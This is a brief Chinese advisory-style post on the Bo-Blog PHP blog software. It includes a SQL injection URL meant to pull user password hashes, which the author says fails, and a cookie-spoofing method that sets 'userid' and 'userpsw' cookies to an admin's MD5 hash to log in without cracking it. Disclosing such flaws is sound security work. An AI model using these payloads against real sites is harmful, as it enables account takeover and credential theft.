影响版本:boblog最新
官方网站:http://www.bo-blog.com//
漏洞类型:COOKIE欺骗
漏洞描述:
代码
index.php代码
if ($go) @list($job, $itemid)=@explode('_', basename($go));
原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
更何况 存在注入漏洞的
`category` in ({$all_needed_cates})");
不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
COOKIES欺骗漏洞很简单
假如某牛真的注入成功得到MD5密码不用去跑MD5了
直接
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', );
既可了……